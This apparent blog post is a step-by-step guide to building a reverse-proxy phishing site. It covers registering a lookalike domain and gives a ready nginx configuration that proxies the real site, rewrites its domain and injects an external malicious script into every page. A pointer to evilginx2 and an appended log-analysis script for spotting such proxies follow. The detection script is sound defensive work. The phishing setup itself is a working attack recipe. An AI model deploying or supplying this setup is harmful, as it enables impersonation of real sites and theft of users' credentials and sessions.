How to create the perfect phishing site
This guide is for ethical hacking purposes only! Don’t use it for malicious stuff.
Phishing is the most common and easiest way to steal user data. As an administrator it is my job to secure our sites against different kinds of attacks. Unfortunately there is currently no technical way to protect users against phishing sites.
In this blog post, I demonstrate the easiest way to create a perfect phishing site. In a follow-up blog post, I will discuss possible countermeasures.
Approach 1 - Copy The Site
This is the most common approach. Most “How to” guides recommend it for creating a phishing site. In my opinion, this is not a very elegant way of doing it. It takes more effort and the result is most often far from perfect. Most of the time this is good enough for a common phishing site, but for a targeted attack I would prefer another approach.
Approach 2 - Reverse Proxy
There’s a much easier approach. By setting up a reverse proxy, you do not have to copy the site at all. You simply forward every request to the site you are imitating and manipulate the response on its way back. But how does that work? The following guide is not complete. It does not include methods for bypassing any countermeasures.
Step 1 - Set Up A Small Server
Set up a small root server, e.g. a $5 DigitalOcean droplet. In this tutorial I use Debian/Ubuntu. The commands will differ on other distributions.
Step 2 - Set Up A Domain
Find a domain that is as close to the target domain as possible. If the target domain is "next-gen-company.com", check whether "next-gen-company-ag.com" is available. The closer your domain is to the original domain, the more successful your phishing site will be.
Step 3 - Configure Your DNS Zone
Set up the A record for "next-gen-company-ag.com" and point it to your server.
Step 4 - Install nginx
Install the web server nginx. On Debian/Ubuntu you can do this by typing:
sudo apt-get install nginx
Step 5 - Configure nginx
Put the following configuration into the file /etc/nginx/sites-available/default:
server {
    listen 80 default_server;
    listen [::]:80 default_server;

    location / {
        # Forward every request to the original site.
        proxy_pass https://next-gen-company.com;

        # Rewrite the original domain in the response body to our domain.
        sub_filter next-gen-company.com next-gen-company-ag.com;

        # Inject a script tag before the closing head element.
        sub_filter "</head>" "<script src='https://url.com/your-malicious-script.js'></script></head>";

        # Ask the upstream for uncompressed responses so sub_filter can modify them.
        proxy_set_header Accept-Encoding "";

        # Replace every occurrence, not only the first one.
        sub_filter_once off;
    }
}
Step 6 - Reload Server
Check the configuration with:
nginx -t
If the configuration is ok, run:
service nginx reload
That's it
That was simple, wasn't it? Just open next-gen-company-ag.com and watch the result.
There may be some more modifications to make, but I think you got the point.
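Because every victim of such a reverse proxy is funnelled through one server, the real site sees all those logins coming from a single source IP, often with a Referer pointing at the lookalike domain. The following detection script is an added example for the defending administrator, not part of the original post; it assumes the nginx "combined" access log format, and the log lines and host names in it are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Hostnames that legitimately serve the site (assumption for this example).
LEGIT_HOSTS = {"next-gen-company.com", "www.next-gen-company.com"}

# nginx "combined" log format:
# $remote_addr - $remote_user [$time_local] "$request" $status $bytes "$referer" "$ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: three different browsers log in via one IP,
# all referred from the lookalike domain; one genuine login from elsewhere.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.10 - - [10/Oct/2023:13:55:40 +0000] "POST /login HTTP/1.1" 302 0 "https://next-gen-company-ag.com/login" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.10 - - [10/Oct/2023:13:56:01 +0000] "POST /login HTTP/1.1" 302 0 "https://next-gen-company-ag.com/login" "Mozilla/5.0 (Macintosh)"
203.0.113.10 - - [10/Oct/2023:13:56:30 +0000] "POST /login HTTP/1.1" 302 0 "https://next-gen-company-ag.com/login" "Mozilla/5.0 (X11; Linux)"
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "POST /login HTTP/1.1" 302 0 "https://next-gen-company.com/login" "Mozilla/5.0 (iPhone)"
"""


def parse(log_text):
    """Yield one dict per well-formed combined-format log line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_proxy_phishing(log_text, min_agents=3):
    """Return (foreign_referer_counts, suspicious_ips) for login POSTs.

    foreign_referer_counts: Referer hosts that are not ours -> hit count.
    suspicious_ips: source IPs submitting logins with >= min_agents
    distinct User-Agents, i.e. many victims behind one proxy box.
    """
    foreign = defaultdict(int)
    agents_by_ip = defaultdict(set)
    for e in parse(log_text):
        if not e["req"].startswith("POST /login"):
            continue
        host = urlsplit(e["referer"]).hostname  # None for "-"
        if host and host not in LEGIT_HOSTS:
            foreign[host] += 1
        agents_by_ip[e["ip"]].add(e["ua"])
    suspicious = {ip for ip, uas in agents_by_ip.items() if len(uas) >= min_agents}
    return dict(foreign), suspicious
```

A proxy operator can strip the Referer, so the per-IP User-Agent diversity check is kept as an independent signal; both should be tuned against your own traffic before alerting on them.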
Evilginx2
If you are looking for a ready-to-use solution for penetration testing, check out https://github.com/kgretzky/evilginx2